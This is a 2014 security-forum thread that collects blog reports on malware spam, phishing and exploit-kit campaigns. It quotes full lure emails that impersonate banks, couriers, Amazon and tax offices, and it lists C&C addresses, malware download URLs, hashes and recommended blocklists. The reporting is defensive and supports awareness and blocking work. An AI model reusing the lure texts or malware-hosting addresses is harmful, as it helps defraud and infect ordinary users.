Current Virus total detections: 9/55* . This 'CHEN YOUNG BANK SWIFT' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/ff424a01fd1a1f3fd0bb50704d16cd8fe63f7d4136b2df4bf6b8924bace8c979/analysis/1412582411/
___
Fake Tiffany invoice SPAM – PDF malware
- http://myonlinesecurity.co.uk/tiffany-invoice-copy-waiting-confirmation-fake-pdf-malware/
6 Oct 2014 - "'invoice copy (waiting for your confirmation)' pretending to come from Tiffany & Co. <j.parker@ tiffany .co.uk> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Kindly open to see export License and payment invoice attached, meanwhile we sent the balance payment yesterday.
Please confirm if it has settled in your account or you can call if there is any problem.
Thanks J.parker
Tiffany & Co.
6 October 2014: Tiffany order details 06-10-2014.zip:
Extracts to: Tiffany order details 06-10-2014.exe
Current Virus total detections: 6/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f1b13062f764e0e5643da3e74753d912d596cc362def9142263cea0e686bba80/analysis/1412597423/
:fear: :mad:
AplusWebMaster
2014-10-07, 15:35
FYI...
DHL phish ...
- http://blog.dynamoo.com/2014/10/dhl-themed-phish-goes-to-lot-of-effort.html
7 Oct 2014 - "This DHL-themed phish is trying to harvest email credentials, but instead of just spamming out a link, it spams out a PDF file with the link embedded in it.
Screenshot: https://3.bp.blogspot.com/-J8JkllU3g1M/VDOdr9sAc5I/AAAAAAAAFyQ/VE4P9MxOkGY/s1600/dhl.png
Look closely at the blurb at the bottom and it confuses DHL with UPS, but who reads that? Attached is a non-malicious PDF file DHL (1).pdf which contains a link to the phishing site.
Screenshot2: https://2.bp.blogspot.com/-smrDiPpKzJY/VDOeWRTX8uI/AAAAAAAAFyY/oucaylYyHdQ/s1600/dhl2.png
... a neat trick to use PDF files in this way as a lot of spam filters and anti-phishing tools won't spot it. The link in the PDF goes to 37.61.235.199 /~zantest/doc1/dhlweb0002/webshipping_dhl_com_members_modulekey_displaycountrylist_id5482210003804452/DHL/index .htm where it has a rather less professional looking webpage that is phishing for general email addresses rather than DHL credentials.
Screenshot3: https://4.bp.blogspot.com/-BDpUiMlKaEk/VDOfv4G-CmI/AAAAAAAAFyk/sS4m_BsPR1I/s1600/dhl3.png
With the grotty graphics and injudicious use of Comic Sans, it's hard to see how this would fool anyone into turning over their credentials.. but presumably they manage to harvest enough usernames and passwords to make it worthwhile."
37.61.235.199: https://www.virustotal.com/en/ip-address/37.61.235.199/information/
___
Fake Outlook voice mail SPAM – wav malware
- http://myonlinesecurity.co.uk/microsoft-outlook-received-voice-mail-fake-wav-malware/
7 Oct 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook <no-reply@ random domain address > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE0003589463733.wav
Caller-Id: 3589463733
Message-Id: ZU1I9W
Email-Id: montag @ myonlinesecurity .co .uk
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server
7 October 2014: VOICE3589463733.wav.zip: Extracts to: VOICE000358276655116307.exe
Current Virus total detections: 10/55* . This You have received a voice mail is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( sound ) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected...*
* https://www.virustotal.com/en/file/fb286c8c0c1bbf7c89be27016a7fce614515fa47e1e5219618b15ead6d0cf544/analysis/1412673429/
___
Vishing ...
- https://blog.malwarebytes.org/fraud-scam/2014/10/here-vishy-vishy/
Oct 7, 2014 - "Voice phishing – Vishing, for short – has been around for a long time and is all about using the phone and social engineering to grab the information required...
Ref: http://www.edinburghnews.scotsman.com/news/crime/vishing-scammers-con-woman-out-of-80-000-1-3540027
...
- http://www.telegraph.co.uk/finance/personalfinance/bank-accounts/10882193/I-lost-17500-in-vishing-scam-because-I-didnt-watch-The-One-Show.html
Vishing can start with an email or a text but the ultimate goal is to get you on the other end of a telephone line. From there, the -scammers- will go about harvesting your data by pretending to be your bank and asking for card... It’s important to remember there are many ways to fall foul of a telephone scam than “just” Vishing, and you can take a look at some more examples in a roundup by the FTC*..."
* http://www.consumer.ftc.gov/articles/0076-phone-scams
___
419 SCAM - Breast Cancer Awareness Donation
- http://myonlinesecurity.co.uk/ongoing-breast-cancer-awareness-donation-program-419-scam/
7 Oct 2014 - "This rather evil and nasty 419 scam saying Ongoing Breast Cancer Awareness Donation Program pretends to come from Neil trotter Cancer Foundation <neil–trotter@ [redacted] .com>... The email looks like this with pictures:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/Ongoing-Breast-Cancer-Awareness-Donation-Program.png
Obviously it is a total -scam- and you should -not- reply to any email received that is like this."
___
Fake inTuit/Apple malicious SPAM
- https://security.intuit.com/alert.php?a=111
Oct 7, 2014 - "People are receiving fake emails with the title 'Your receipt No.557911643385'. These mails are coming from applecenter@ security .intuit .com, which is -not- a legitimate email address (spoofed). Below is a copy of the email people are receiving:
Apple iTunes
October 07, 2014
Billed To:
Order ID: KT85GMQ55L
Receipt Date: 10/07/2014
Order Total: $161.98
Billed To: Store Credit
Item Artist
August: Osage County John Wells
My Man Is a Loser Mike Young
Type Unit Price
Film Rental(HD) $67.99
Film Rental(HD) $93.99
Order Total
$161.98
Issues with this transaction?
If you haven't authorized this transaction, click the link below to get full refund...
2014 Apple Online Support
This is the end of the -fake- email.
Steps to Take Now:
- Do not open the attachment in the email.
- Do not -click- on any -links- in the email..
- Delete the email.
___
Yahoo Sports servers - malicious code
- http://www.theinquirer.net/inquirer/news/2374191/yahoo-shellshock-not-to-blame-for-server-security-flaw
Oct 7 2014 - "... there was some kind of security breach on its servers, but took pains to clear up reports which suggested that Shellshock was the reason. Yahoo's chief information security officer, Alex Stamos, took to the net to counter comments that began at Yahoo*..."
* https://news.ycombinator.com/item?id=8418809
Oct 6 2014 - "... I’m the CISO of Yahoo and I wanted to clear up some misconceptions. Earlier today, we reported that we isolated a handful of servers that were detected to have been impacted by a security flaw. After investigating the situation fully, it turns out that the servers were in fact -not- affected by Shellshock. Three of our Sports API servers had malicious code executed on them this weekend by attackers looking for vulnerable Shellshock servers. These attackers had mutated their exploit, likely with the goal of bypassing IDS/IDP or WAF filters. This mutation happened to exactly fit a command injection bug in a monitoring script our Sports team was using at that moment to parse and debug their web logs. Regardless of the cause our course of action remained the same: to isolate the servers at risk and protect our users' data. The affected API servers are used to provide live game streaming data to our Sports front-end and do not store user data. At this time we have found -no- evidence that the attackers compromised any other machines or that any user data was affected. This flaw was specific to a small number of machines and has been -fixed- and we have added this pattern to our CI/CD code scanners to catch future issues... the servers in question had been successfully patched (twice!!) immediately after the Bash issue became public. Once we ensured that the impacted servers were isolated from the network, we conducted a comprehensive trace of the attack code through our entire stack which revealed the root cause: -not- Shellshock... just because exploit code works doesn’t mean it triggered the bug you expected!... Yahoo takes external security reports seriously and we strive to respond immediately to credible tips... our records show no attempt by this researcher to contact us using those means. Within an hour of our CEO being emailed directly we had isolated these systems and begun our investigation..."
___
Adobe - spying on e-book readers
- http://www.theinquirer.net/inquirer/news/2374349/adobe-accused-of-spying-on-e-book-readers
Oct 7 2014
- http://arstechnica.com/security/2014/10/adobes-e-book-reader-sends-your-reading-logs-back-to-adobe-in-plain-text/
Oct 7 2014
- http://the-digital-reader.com/2014/10/06/adobe-spying-users-collecting-data-ebook-libraries/
:mad: :fear:
AplusWebMaster
2014-10-08, 14:45
FYI...
Fake Business proposal - Phish ...
- https://blog.malwarebytes.org/fraud-scam/2014/10/dear-important-business-proposal/
Oct 8, 2014 - "Carter Ham, a retired four-star United States Army general, is supposedly on Linkedin—and he wants you (to read his personal message)... clearly a scheme to phish for information from unwary recipients. Below is a screenshot of the sender’s online profile:
General Carter Ham on Linkedin. Not!:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/linkedin-gch.png
... As far as the legitimacy of the profile goes, the blurb from the Summary section was copied and pasted from this Wikipedia page*. We don’t know if the former general is indeed on the said social networking site (in case you’re wondering). What we -do- know is that if you receive a message similar to the one above asking for personal information from you in exchange for a slice of the cash s/he wanted to move, it’s best to ignore the message and check with this contact if his/her account has been hacked or not."
* http://en.wikipedia.org/wiki/Carter_Ham
___
Fake Lloyds and NatWest SPAM - malware
- http://blog.dynamoo.com/2014/10/malware-spam-lloyds-important.html
8 Oct 2014 - "... familiar pattern to this malware-laden spam, but with an updated payload from before:
Lloyds Commercial Bank: "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 8 October 2014 11:09
Subject: Important - Commercial Documents
Important account documents
Reference: C437
Case number: 66324010
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...
From: NatWest [secure.message@ natwest .com]
Date: 8 October 2014 10:29
Subject: You have a new Secure Message - file-2620
You have received a encrypted message from NatWest Customer Support
In order to view the attachment please open it using your email client ( Microsoft Outlook, Mozilla Thunderbird, Lotus )
Please download your ecnrypted message at ...
(Google Disk Drive is a file hosting service operated by Google, Inc.) ...
The link in the email runs through a script which will attempt to download a ZIP file pdf-to-view_864129_pdf.zip onto the target machine which in turn contains a malicious executable pdf-to-view_864129_pdf.exe which has a VirusTotal detection rate of 6/53*. The Malwr report indicates that the malware phones home to the following locations which are worth -blocking- especially 94.75.233.13 (Leaseweb, Netherlands) which looks like a C&C server."
94.75.233.13 :37400/0810uk1/HOME/0/51-SP3/0/
94.75.233.13 :37400/0810uk1/HOME/1/0/0/
94.75.233.13 :37400/0810uk1/HOME/41/5/1/
cemotrans .com/seo/0810uk1.soa
* https://www.virustotal.com/en/file/3c04500e3adf84f62f6428f5d739d5f877e81071bcdfff9d186f120533ffe0df/analysis/1412773720/
... Behavioural information
DNS requests
cemotrans .com (82.98.157.8)
TCP connections
94.75.233.13: https://www.virustotal.com/en/ip-address/94.75.233.13/information/
82.98.157.8: https://www.virustotal.com/en/ip-address/82.98.157.8/information/
___
Fake photo SPAM – malware
- http://myonlinesecurity.co.uk/photo-8-oct-2014-malware/
8 Oct 2014 - "'photo 8 oct 2014' pretending to come from various @yahoo.co.uk addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email is very plain and terse with the subject of photo 8 oct 2014 and the body simply says:
Sent from my iPhone
8 October 2014: Img-0034.zip: Extracts to: Img-0034.jpeg
Current Virus total detections: 2/54* . Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day..."
* https://www.virustotal.com/en/file/272804c706382e8a994bce09d36f0d620ba97dde68c2b590f26d442f984ce773/analysis/1412768396/
___
Fake Invoice Balance SPAM - word doc malware
- http://myonlinesecurity.co.uk/invoice-balance-fake-word-doc-malware/
8 Oct 2014 - "'Invoice Balance' pretending to come from various Hotmail .co.uk addresses is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
HELLO,
work-life balance.
Thanks
---
8 October 2014: Invoice_Balance_september_doc.zip: Extracts to: Invoice_Balance_september_doc.exe
Current Virus total detections: 2/53* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/272804c706382e8a994bce09d36f0d620ba97dde68c2b590f26d442f984ce773/analysis/1412766448/
___
Australian Taxation Office Refund Spam
- http://threattrack.tumblr.com/post/99483080723/australian-taxation-office-refund-spam
Oct 8, 2014 - "Subjects Seen:
Australian Taxation Office - Refund Notification
Typical e-mail details:
IMPORTANT NOTIFICATION
Australian Taxation Office - 08/10/2014
After the last calculation of your fiscal activity we have determined that you are eligible to receive a refund of 2398.43 AUD.
For more details please follow the steps bellow :
- Right-click the link on the attachment name, and select Save Link As, Save Target As or a similar option provided.
- Select the location into which you want to download the file and choose Save.
- Unzip the attached file.
Ingrid Warren,
Tax Refund Department
Australian Taxation Office
Malicious File Name and MD5:
ATO_TAX_419771083.zip (EBE4991F3C1C4B00E3E8662577139F3E)
ATO_TAX_419771083.pdf.scr (A89CD5ACAB413D308A565B21B481A2F8)
Tagged: australian taxation office, Upatre, ATO
:fear: :mad:
AplusWebMaster
2014-10-09, 13:18
FYI...
Nuclear EK active on 178.79.182.106
- http://blog.dynamoo.com/2014/10/nuclear-ek-active-on-17879182106.html
9 Oct 2014 - "It looks like the Nuclear exploit kit is active on 178.79.182.106 (Linode, UK), using hijacked subdomains of legitimate domains using AFRAID.ORG nameservers. I can see the following sites active on that IP:
fuhloizle .tryzub-it .co.uk
fuhloizle .pgaof39 .com
fuhloizle .cusssa .org
"fuhloizle" is a pretty distinctive search string to look for in your logs. It looks like the bad sites might be down at the moment (or the kit is hardened against analysis), but blocking this IP address as a precaution might be a good idea."
178.79.182.106: https://www.virustotal.com/en/ip-address/178.79.182.106/information/
___
chinaregistry .org.cn domain SCAM
- http://blog.dynamoo.com/2014/10/chinaregistryorgcn-domain-scam.html
9 Oct 2014 - "This is an old scam that can safely be ignored.
From: Henry Liu [henry.liu@ chinaregistry .org.cn]
Date: 9 October 2014 07:53
Subject: [redacted] domain and keyword in CN
(Please forward this to your CEO, because this is urgent. Thanks)
We are a Network Service Company which is the domain name registration center in Shanghai, China. On Oct 7, 2014, we received an application from Huaya Holdings Ltd requested "[redacted]" as their internet keyword and China (CN) domain names. But after checking it, we find this name conflict with your company name or trademark. In order to deal with this matter better, it's necessary to send email to you and confirm whether this company is your distributor or business partner in China?Kind regards
Henry Liu
General Manager
China Registry (Headquarters)
3002, Nanhai Building, No. 854 Nandan Road,
Xuhui District, Shanghai, China ...
Nobody is trying to register your domain name, this is simply a long-running scam aimed at getting you to spend too much money on something that you don't need. And I strongly recommend that you don't forward junk email like this to your CEO either..."
(Short video at the dynamoo URL above.)
___
Bash Bug saga continues: Shellshock Exploit via DHCP
- http://blog.trendmicro.com/trendlabs-security-intelligence/bash-bug-saga-continues-shellshock-exploit-via-dhcp/
Oct 8, 2014 - "The Bash vulnerability known as Shellshock can be exploited via several attack surfaces including web applications, DHCP, SIP, and SMTP. With multiple proofs of concept (including -Metasploit- code) available in the public domain, this vulnerability is being heavily exploited. Most discussion of Shellshock attacks have focused on attacks on web apps. There has been relatively little discussion on on other surfaces like DHCP, SMTP, and CUPS... techniques could be used by an attacker to compromise more machines within the network. Dynamic Host Configuration Protocol (DHCP) is a protocol used to dynamically distribute and assign network configuration settings, such as IP addresses. An attacker can configure a compromised DHCP server or create a rogue DHCP server to send -malicious- information to the DHCP client. Either technique means that the attacker has already compromised the network using other attack vectors... Various techniques can be used to to exploit Shellshock over DHCP..."
(More detail at the trendmicro URL above.)
:mad: :fear:
AplusWebMaster
2014-10-10, 16:43
FYI...
Fake fax, 'Secure msg' SPAM - malware
- http://blog.dynamoo.com/2014/10/malware-spam-youve-received-new-fax-you.html
10 Oct 2014 - "A pair of malware spams this morning, both with the same payload:
"You've received a new fax"
From: Fax [fax@ victimdomain .com]
Date: 10 October 2014 11:34
Subject: You've received a new fax
New fax at SCAN7097324 from EPSON by https ://victimdomain .com
Scan date: Fri, 10 Oct 2014 18:34:56 +0800
Number of pages: 2
Resolution: 400x400 DPI
You can secure download your fax message at ...
(Google Disk Drive is a file hosting service operated by Google, Inc.)
"You have received a new secure message from BankLine"
From: Bankline [secure.message@ bankline .com]
Date: 10 October 2014 10:29
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it...
The malware downloads a file document_73128_91898_pdf.zip from the target site that contains a malicious executable document_73128_91898_pdf.exe which has a VirusTotal detection rate of 4/54*. According to the ThreatExpert report... the malware communicates with the following URLs which are probably worth -blocking- or monitoring"
94.75.233.13 /1010uk1/NODE01/41/5/1/
94.75.233.13 /private/sandbox_status.php
94.75.233.13 /1010uk1/NODE01/0/51-SP3/0/
94.75.233.13 /1010uk1/NODE01/1/0/0/
beanztech .com/beanz/1010uk1.rtf
* https://www.virustotal.com/en/file/5c3643b5cf2c5a392a55589e5025bfe659149a0b5da662ad8989f25005ba28cc/analysis/1412937674/
94.75.233.13: https://www.virustotal.com/en/ip-address/94.75.233.13/information/
___
Gameover Zeus... at Vogue .com
- http://www.threattracksecurity.com/it-blog/gameover-zeus-accessorizes-vogue-com/
Oct 10, 2014 - "Our researchers this week spotted a Gameover Zeus sample receiving commands to download Zemot from hxxp ://media .vogue[dot]com/voguepedia/extensions/dimage/cache/1zX67.exe
... Others have spotted Gameover Zeus reaching out to a compromised vogue.com domain to download Zemot – a family of Trojan downloaders – which according to Microsoft is usually distributed via the Kuluoz botnet*. Behavior worth noting in this Gameover Zeus sample upon execution is that it crawled a list of DGA domains... this Gameover Zeus sample seems to be an updated variant targeting -financial- processes we’ve not yet seen in previous reports... According to URLquery.net**, there were several malicious files being served on the Vogue domain, which have been removed. 1zX67.exe was an active threat as late as yesterday evening..."
* http://blogs.technet.com/b/mmpc/archive/2014/09/09/msrt-september-2014-zemot.aspx
** http://www.urlquery.net/report.php?id=1412718766058
___
Mobile ads use malware tricks to get installs
- https://blog.malwarebytes.org/mobile-2/2014/10/mobile-advertisers-use-malware-tricks-to-get-installs/
Oct 10, 2014 - "Deceptive advertising targeting Android users is an effective way of getting malware installed. Now some advertisers are using it to get paid through pay-per-install schemes... we’ve been seeing more and more of this, but this time advertisers are using these banner and pop-up ads to get installs of more trustworthy apps like Dolphin browser. The messages are less scary than the virus related ones, but they are still meant to get your attention. It seems a bit backwards but it’s all about making money, ad developers are just as greedy as malware authors–just not as malicious. Anytime during your mobile browsing experience, if you encounter one of these pop-ups or similar just ignore and it’d probably be best to -leave- the site displaying them:
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/and_ads06.jpg?w=564
...
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/and_ads05.jpg?w=564
Don’t fall for these messages, Android won’t use web pop-ups to inform you of updates, they’ll be handled through a system notification and apps will update via Google Play Services. Using a tool like Adblock Plus which will filter URL traffic can help prevent most of these ads. Adblock Plus is a third-party app, will require a bit of configuration* and only blocks WiFi traffic.
* https://adblockplus.org/en/android-config
...
> https://blog.malwarebytes.org/wp-content/uploads/2014/10/and_ad11.jpg
On iOS you won’t see the warning pop-ups, instead you’ll immediately be -redirected- to the peddled apps App Store page. If, by chance, you’re interested in installing one of these apps go -directly- to your trusted source for apps. By following the redirect you might be going down another rabbit hole and end up getting -malware- instead of the original."
___
October 2014 Web Server Survey
- http://news.netcraft.com/archives/2014/10/10/october-2014-web-server-survey.html
10 Oct 2014 - "In the October 2014 survey we received responses from 1,028,932,208 sites, which is nearly six million more than last month. Microsoft lost the lead to Apache this month, as the two giants continue to battle closely for the largest share of all websites. Apache gained nearly 30 million sites, while Microsoft lost 22 million, causing Apache to be thrust back into the lead by more than 36 million sites. In total, 385 million sites are now powered by Apache, giving it a 37.45% share of the market. A significant contributor to this change was the expiry of domains previously used for link farming on Microsoft IIS servers. The domains used by these link farms were acquired and the sites are now hosted on Apache servers..."
(Charts available at the URL above.)
:fear: :mad:
AplusWebMaster
2014-10-13, 12:31
FYI...
Fake Amazon SPAM - Word doc malware
- http://myonlinesecurity.co.uk/amazon-co-uk-order-word-doc-malware/
13 Oct 2014 - "'Your Amazon.co.uk order #} random letters and numbers' pretending to come from AMAZON .CO.UK <order@ amazon .co.uk> and all being sent to 1122@ eddfg .com with a bcc to your email address is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/amazon_order_Oct.png
13 October 2014 : 575-3010892-0992746.doc Current Virus total detections: 0/54*
Be very careful with email attachments. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email... The basic rule is -NEVER- open any attachment to an email, unless you are expecting it... The best way is to just delete the unexpected zip and not risk any infection."
* https://www.virustotal.com/en/file/3bbcdea4e4f6427296f8b57a77ee70967b9a91a703d69306296c78e1e92fe318/analysis/1413181748/
- http://blog.dynamoo.com/2014/10/your-amazoncouk-order-spam-with.html
13 Oct 2014
___
Fake BankLine SPAM - malware
- http://blog.dynamoo.com/2014/10/malware-spam-you-have-received-new.html
13 Oct 2014 - "A couple of unimaginative spam emails leading to a malicious payload.
You have received a new secure message from BankLine
From: Bankline [secure.message@ bankline .com]
Date: 13 October 2014 12:48
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it...
You've received a new fax
From: Fax [fax@ victimdomain .com]
Date: 13 October 2014 13:07
Subject: You've received a new fax
New fax at SCAN2166561 from EPSON by https ://victimdomain .com
Scan date: Mon, 13 Oct 2014 20:07:31 +0800
Number of pages: 2
Resolution: 400x400 DPI
(Dropbox Drive is a file hosting service operated by Google, Inc.)
Clicking the link downloads document_312_872_pdf.zip from the target site which in turn contains a malicious executable document_312_872_pdf.exe which has a VirusTotal detection rate of 3/54*... Also dropped are a couple of executables, egdil.exe (VT 2/54**, Malwr report) and twoko.exe (VT 6/55***, Malwr report).
Recommended blocklist:
94.75.233.13
144.76.220.116
85.25.152.238
carcomputer .co.uk
phyccess .com
hotelnuovo .com
wirelesssolutionsny .com
isc-libya .com "
* https://www.virustotal.com/en/file/a598ddc9af8438ac29a43a33c8dae09a996d77a5ae10331d7a02ea1df1e0d339/analysis/1413208781/
** https://www.virustotal.com/en/file/35274a3ffbe34b8b17ccdc147cd721c5748d39c6a143b0e4b67812767a4d197b/analysis/1413210259/
*** https://www.virustotal.com/en/file/e464613eaa2aec9fee27a4e3bb91219ca2c5cb38a41217604d6cde292f416445/analysis/1413210280/
___
Barclaycard phishing ...
- http://myonlinesecurity.co.uk/barclaycard-phishing-attempts/
13 Oct 2014 - "We are seeing quite a few Barclaycard phishing attempts today trying to get your Barclaycard details. These are not very well crafted and look nothing like any genuine Barclaycard emails. Do -not- click any links in these emails. Hover your mouse over the links and you will see a web address that isn’t Barclaycard. Immediately delete the email and the safest way to make sure that it isn’t a genuine email from Barclaycard is to type the Barclaycard web address in your browser. and then log in to the account that way...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/barclaycard_phishing-email.png
... using what look like they are hijacked/compromised subdomains of a real website. All of them use a random subdomain and then the website name and then /clients/? The site looks like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2014/10/barclaycard_phishing-site.png
Following the link in this Barclaycard or other spoofed emails takes you to a website that looks exactly like the real Barclaycard site. You are then through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Barclaycard account, but also your Bank Account, and potentially your email details and webspace (if you have it). They want enough information to completely impersonate you and your identity not only in cyberspace but in real life..."
___
Fake Bank application SPAM - malware
- http://www.hoax-slayer.com/fnbo-account-application-malware-email.shtml
Oct 13 2014 - "Email purporting to be from First National Bank of Omaha (FNBO) claims that your account application has been received and invites you to open an -attached- file to view documents about your application:
Re: Applicant #9908541042
Hello,
Your application for an FNBO Direct account has been received. As an FNBO Direct customer, not only will you receive an exceptional interest rate, you can be confident your accounts are held by a bank established in values of trust, integrity, and security.
Please find in the attached document information concerning your application.
Copyright (c) 2014 FNBO Direct, a division of First National Bank of Omaha. All Rights Reserved. Deposit Accounts are offered by First National Bank of Omaha,
Member FDIC. Deposits are insured to the maximum permitted by law.
P.O. Box 3707, Omaha, NE 68103-0707
For information on FNBO Direct's privacy policy, please visit [Link removed]
Email ID: A0963.6
(Email included attached file with the name: 'FNBO_Direct_application_9908541042.zip')
According to this email, which claims to be from First National Bank of Omaha (FNBO), your application for an FNBO Direct account has been received. The message advises that information about your application is contained in an -attached- document... it masquerades as a seemingly legitimate business message and uses the name of a real company... the attached .zip file... contains a .exe file. Clicking the .exe file would install a trojan on your computer... do -not- open any attachments or click any links that it contains. You can report fraudulent FNBO emails via the reporting address on the bank's website*."
* https://www.fnbodirect.com/site/security-center/email-fraud.fhtml
___
Fake FedEx SPAM
- http://blog.mxlab.eu/2014/10/12/fake-email-your-payment-invoice-slip-from-fedex-contains-trojan/
Oct 12, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your Payment Invoice Slip”. This email is send from the -spoofed- address “info@ ukboxingstore .co.uk” and has the following body:
Dear customer.
A parcel was sent to your home address.
And it will arrive within 3 business day.
More information and the tracking number are attached in the document.
Please do not respond to this message. This email was sent from an unattended mailbox.
This report was generated at approximately GMT on 06/10/2014.
To learn more about FedEx Express, please visit our website at fedex.com.
All weights are estimated.
To track the latest status of your shipment, View on the tracking number on the attached document
This tracking update has been sent to you by FedEx on the behalf of the Request or noted above.
FedEx does not validate the authenticity of the requestor and does not validate,
guarantee or warrant the authenticity of the request, the requestor’s message, or the accuracy of this tracking update...
Thank you for your business.
FedEx Customer Service
The attached ZIP file has the name FEDEX SHIPPING NOTIFICATION (1).zip and contains the 396 kB large file XXXX.exe. The trojan is known as TR/Dropper.Gen8, a variant of Win32/Injector.BNJA, HB_Ispi or Win32:Malware-gen. At the time of writing, 5 of the 55 AV engines did detect the trojan at VirusTotal*..."
* https://www.virustotal.com/en/file/7ffd0d31de67f7ece1bf472959078fda55a8091b9487e55c9a3579d8f55a68b1/analysis/1413096741/
:mad: :fear:
AplusWebMaster
2014-10-14, 16:14
FYI...
Fake DOC attachment SPAM - malware
- http://blog.dynamoo.com/2014/10/to-view-your-document-please-open.html
14 Oct 2014 - "This spam comes with a malicious DOC attachment:
From: Anna [ºžô õö?ǯ#-øß {qYrÝsØ l½:ž±þ EiÉ91¤É¤y$e| p‹äŒís' ÀQtÃ#7 þ–¿åoù[þ–¿åoù[þ–¿åoù[þ–¿åÿ7 å{˜x|%S;ÖUñpbSË‘ý§B§i…¾«¿¨` Òf ¶ò [no-reply@ bostonqatar .net]
Date: 14 October 2014 11:09
Subject: Your document
To view your document, please open attachment.
The "From" field in the samples I have seen seems to be a random collection of characters. The DOC attachment is also randomly named in the format document_9639245.doc. This word document contains a malicious macro [pastebin] which downloads an additional component from pro-pose-photography .co.uk/fair/1.exe. The DOC file has a VirusTotal detection rate of 0/55* and the EXE file is just 2/54** ... UPDATE: among other things the malware drops the executable pefe.exe with a detection rate of 3/55***..."
* https://www.virustotal.com/en-gb/file/38e14668c5676fd53234abc8128ba16b2f5b19ccadaa6dda75c3a2bf9480d285/analysis/1413281775/
** https://www.virustotal.com/en-gb/file/9f202cf5e15101c5a7e05280ad4dc86092b4036dcbbd8dd144e58c4115638e75/analysis/1413283670/
*** https://www.virustotal.com/en-gb/file/c9ae7f694229861dd05492bd532980f2504c3bc3ce58fd6fad71c44cb053d643/analysis/1413287366/
- http://myonlinesecurity.co.uk/document-word-doc-malware/
14 Oct 2014 - "... The email is very plain, simple and terse and just says:
To view your document, please open attachment.
14 October 2014: document_1720781.doc Current Virus total detections: 0/55* ..."
* https://www.virustotal.com/en/file/38e14668c5676fd53234abc8128ba16b2f5b19ccadaa6dda75c3a2bf9480d285/analysis/1413281933/
___
Fake Sales Order SPAM - word doc malware
- http://myonlinesecurity.co.uk/sales-order-number-son1410-000183-fake-word-doc-malware/
14 Oct 2014 - "'Sales Order Number SON1410-000183' pretending to come from mail@ firwood .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
<html>
<body bgcolor=”#FFFFFF”>
<table width=”750″ border=”0″>
<tr>
<td>
<font face=”verdana” size=”2″></font>
<br><br>
<font face=”verdana” size=”2″>Please find the attached document a summary
of which is below:</font>
</td>
</tr>
</table>
<table width=”750″ border=”0″> ...
</table>
<font face=”verdana” size=”2″>Regards </br></br><B>Firwood Paints Ltd
</B></br>Oakenbottom Road </br>Bolton BL2 6DP England </br></br>Tel +44
(0)1204 525231 </br>Fax +44 (0)1204 362522 </br>e mail mail@ firwood .co.uk
</br></font>
</body>
</html>
Automated mail message produced by DbMail.
Registered to X3 – Sage North America, License EDM2013051.
This message has been scanned for viruses by BlackSpider MailControl ...
14 October 2014: Extracts to: SON141000-000183.pdf.exe
Current Virus total detections: 13/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word .doc file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/1fd1e3787b4982b6029ebd9859d6aff3bd313903a2322c29a80bbd105a5651ac/analysis/1413274440/
___
YouTube Ads lead to Exploit Kits ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/youtube-ads-lead-to-exploit-kits-hit-us-victims/
Oct 14, 2014 - "Malicious ads are a common method of sending users to sites that contain malicious code. Recently, however, these ads have showed up on a new attack platform: YouTube. Over the past few months, we have been monitoring a malicious campaign that used malicious ads to direct users to various malicious sites. Users in the United States have been affected almost exclusively, with more than 113,000 victims in the United States alone over a 30-day period.
Countries affected by this malicious ad campaign:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/10/malad.jpg
